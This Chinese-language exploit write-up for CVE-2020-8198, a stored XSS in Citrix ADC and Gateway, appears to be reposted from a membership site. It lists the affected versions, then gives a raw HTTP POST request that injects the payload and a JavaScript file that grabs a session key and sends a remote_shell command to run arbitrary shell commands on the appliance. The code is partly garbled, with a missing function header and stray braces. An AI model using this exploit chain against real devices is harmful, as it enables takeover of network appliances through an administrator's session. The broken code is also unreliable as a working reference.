（CVE-2020-8198）Citrix_储存型xss-棉花糖会员站

# （CVE-2020-8198）Citrix 储存型xss

=================================

一、漏洞简介
————

要求受害者以NSIP管理员（nsroot）的身份登录

二、漏洞影响
————

Citrix ADC and Citrix Gateway: \< 13.0-58.30 Citrix ADC and NetScaler Gateway: \< 12.1-57.18 Citrix ADC and NetScaler Gateway: \< 12.0-63.21 Citrix ADC and NetScaler Gateway: \< 11.1-64.14  NetScaler ADC and NetScaler Gateway: \< 10.5-70.18 Citrix SD-WAN WANOP: \< 11.1.1a Citrix SD-WAN WANOP: \< 11.0.3d Citrix SD-WAN WANOP: \< 10.2.7 Citrix Gateway Plug-in for Linux: \<  1.0.0.137 三、复现过程 ------------ POST /menu/stapp HTTP/1.1 Host: www.0-sec.org User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Length: 96 Content-Type: application/x-www-form-urlencoded X-NITRO-USER: henk sid=254&pe=1,2,3,4,5&appname=%0a&au=1&username=nsroot

### 深入利用

> csrf.html

> code\_exec.js

function load(url, callback) {
var xhr = new XMLHttpRequest();

xhr.onreadystatechange = function() {
if (xhr.readyState === 4) {
rand = callback(xhr.response);
exec_command(rand);
}
}

xhr.open(‘GET’, url, true);
xhr.send(”);
}

var obj = {
“params”:{
“warning”:”YES”
},
“remote_shell”:{
“command”:command,
“prompt”:”>”,
“target”:”shell”,
“suppress”:0,
“execute_in_partition”:””
}
}

var xhr = new XMLHttpRequest();

xhr.onreadystatechange = function() {
if (xhr.readyState === 4) {
response = JSON.parse(xhr.response);
alert(response[‘remote_shell’][‘output’]);
}
}

xhr.open(‘POST’, url, true);
xhr.setRequestHeader(‘rand_key’, rand)
xhr.setRequestHeader(‘Content-Type’, ‘application/x-www-form-urlencoded’)
xhr.send(‘object=’ + JSON.stringify(obj));

}

var url = ‘/menu/stc’;
load(url, get_rand)

1.png

文章版权归作者所有，未经允许请勿转载。

THE END